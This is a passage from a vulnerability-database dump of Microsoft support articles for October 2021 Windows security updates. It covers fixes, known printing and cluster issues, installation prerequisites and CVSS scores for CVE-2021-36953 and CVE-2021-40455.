attempt to connect to a network printer for the first time. We have observed this issue on devices that access printers using a print server that uses HTTP connections.\n * Addresses a known issue that might ask for administrative credentials every time you attempt to print. This occurs in environments in which the print server and print client are in different times zones.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [October 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Oct>).\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer,\u201d and the update might show as **Failed **in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\n * If you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/obtaining-extended-security-updates-for-eligible-windows-devices/ba-p/1167091>) post. For information on the prerequisites, see the **How to get this update** section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \"STATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\". This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5007233](<https://support.microsoft.com/help/5007233>). \nAfter installing this update, Windows print clients might encounter the following errors when connecting to a remote printer shared on a Windows print server:\n\n * 0x000006e4 (RPC_S_CANNOT_SUPPORT)\n * 0x0000007c (ERROR_INVALID_LEVEL)\n * 0x00000709 (ERROR_INVALID_PRINTER_NAME)\n**Note** The printer connection issues described in this issue are specific to print servers and are not commonly observed in devices designed for home use. Printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5008282](<https://support.microsoft.com/help/5008282>). \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/cloud-platform/extended-security-updates>) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the latest SSU ([KB5006749](<https://support.microsoft.com/help/5006749>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5006671](<https://support.microsoft.com/help/5006671>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5006728>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5006728](<https://download.microsoft.com/download/8/b/c/8bc38850-b0cf-432c-904f-c57c562e20a8/5006728.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-12T07:00:00", "type": "mskb", "title": "October 12, 2021\u2014KB5006728 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36953"], "modified": "2021-10-12T07:00:00", "id": "KB5006728", "href": "https://support.microsoft.com/en-us/help/5006728", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-10T14:17:33", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update.\n\n**Important: **Windows 7 and Windows Server 2008 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 and Windows Server 2008 R2 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5005633](<https://support.microsoft.com/help/5005633>) (released September 14, 2021) and addresses the following issues:\n\n * Addresses an issue in which an Internet print server cannot package the driver to send to the client.\n * Implements a Group Policy setting for the following registry value:\n * Registry location: **HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint**\n * Value name: **RestrictDriverInstallationToAdministrators**\n * Value data: **1**\nFor more information, see KB5005652.\n * Adds the ability to configure period or dot (.) delimited IP addresses interchangeably with fully qualified host names in the following Group Policy settings:\n * [Package Point and Print - Approved Servers](<https://gpsearch.azurewebsites.net/Default_legacy.aspx?PolicyID=2208>)\n * [Point and Print Restrictions](<https://gpsearch.azurewebsites.net/Default_legacy.aspx?PolicyID=2212>)\n * Addresses an issue in which Security Account Manager (SAM) events are not displayed properly in the Event Viewer.\n * Addresses a known issue that might prevent devices from downloading and installing printer drivers when the devices attempt to connect to a network printer for the first time. We have observed this issue on devices that access printers using a print server that uses HTTP connections.\n * Addresses a known issue that might ask for administrative credentials every time you attempt to print. This occurs in environments in which the print server and print client are in different times zones.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [October 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Oct>).\n\n## **Known issues in this update**\n\n**Symptom **| **Workaround ** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \"Failure to configure Windows updates. Reverting Changes. Do not turn off your computer\", and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/obtaining-extended-security-updates-for-eligible-windows-devices/ba-p/1167091>) post. For information on the prerequisites, see the **How to get this update** section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \"STATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\". This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following: \n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5007236](<https://support.microsoft.com/help/5007236>). \nAfter installing this update, Windows print clients might encounter the following errors when connecting to a remote printer shared on a Windows print server:\n\n * 0x000006e4 (RPC_S_CANNOT_SUPPORT)\n * 0x0000007c (ERROR_INVALID_LEVEL)\n * 0x00000709 (ERROR_INVALID_PRINTER_NAME)\n**Note** The printer connection issues described in this issue are specific to print servers and are not commonly observed in devices designed for home use. Printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5008244](<https://support.microsoft.com/help/5008244>). \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/cloud-platform/extended-security-updates>) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ended on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ended on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter you install the items above, we strongly recommend that you install the latest SSU ([KB5006749](<https://support.microsoft.com/help/5006749>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5006743>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5006743](<https://download.microsoft.com/download/2/a/e/2ae5b268-0eef-42c9-9395-4ff779b72981/5006743.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-12T07:00:00", "type": "mskb", "title": "October 12, 2021\u2014KB5006743 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36953"], "modified": "2021-10-12T07:00:00", "id": "KB5006743", "href": "https://support.microsoft.com/en-us/help/5006743", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-01-18T17:45:41", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update.\n\n**Important: **Windows Server 2008 Service Pack 2 (SP2) has reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nWSUS scan cab files will continue to be available for Windows Server 2008 SP2. If you have a subset of devices running this operating system without ESU, they might show as non-compliant in your patch management and compliance toolsets.\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a known issue that might prevent devices from downloading and installing printer drivers when the devices attempt to connect to a network printer for the first time. We have observed this issue on devices that access printers using a print server that uses HTTP connections.\n * Addresses a known issue that might ask for administrative credentials every time you attempt to print. This occurs in environments in which the print server and print client are in different times zones.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [October 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Oct>).\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5007246](<https://support.microsoft.com/help/5007246>). \nAfter installing this update, Windows print clients might encounter the following errors when connecting to a remote printer shared on a Windows print server:\n\n * 0x000006e4 (RPC_S_CANNOT_SUPPORT)\n * 0x0000007c (ERROR_INVALID_LEVEL)\n * 0x00000709 (ERROR_INVALID_PRINTER_NAME)\n**Note** The printer connection issues described in this issue are specific to print servers and are not commonly observed in devices designed for home use. Printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5008271](<https://support.microsoft.com/help/5008271>). \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/cloud-platform/extended-security-updates>) for on-premises versions of this OS must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information on ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, we strongly recommend that you install the latest SSU ([KB5006750](<https://support.microsoft.com/help/5006750>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5006671](<https://support.microsoft.com/help/5006671>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5006715>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5006715](<https://download.microsoft.com/download/5/5/e/55e0dc6e-92b5-498c-8523-36a9572cd875/5006715.csv>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-12T07:00:00", "type": "mskb", "title": "October 12, 2021\u2014KB5006715 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40455"], "modified": "2021-10-12T07:00:00", "id": "KB5006715", "href": "https://support.microsoft.com/en-us/help/5006715", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-01-18T17:45:46", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update.\n\n**Important: **Windows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a known issue that might prevent devices from downloading and installing printer drivers when the devices attempt to connect to a network printer for the first time. We have observed this issue on devices that access printers using a print server that uses HTTP connections.\n * Addresses a known issue that might ask for administrative credentials every time you attempt to print. This occurs in environments in which the print server and print client are in different times zones.\nFor more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>) website and the [October 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Oct>).\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5007245](<https://support.microsoft.com/help/5007245>). \nAfter installing this update, Windows print clients might encounter the following errors when connecting to a remote printer shared on a Windows print server:\n\n * 0x000006e4 (RPC_S_CANNOT_SUPPORT)\n * 0x0000007c (ERROR_INVALID_LEVEL)\n * 0x00000709 (ERROR_INVALID_PRINTER_NAME)\n**Note** The printer connection issues described in this issue are specific to print servers and are not commonly observed in devices designed for home use. Printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5008255](<https://support.microsoft.com/help/5008255>). \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001401](<https://support.microsoft.com/help/5001401>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5006671](<https://support.microsoft.com/help/5006671>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5006732>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Update \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5006732](<https://download.microsoft.com/download/e/3/5/e3597be2-dfc6-47f0-92e2-31ea40ac2907/5006732.csv>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-12T07:00:00", "type": "mskb", "title": "October 12, 2021\u2014KB5006732 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40455"], "modified": "2021-10-12T07:00:00", "id": "KB5006732", "href": "https://support.microsoft.com/en-us/help/5006732", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, 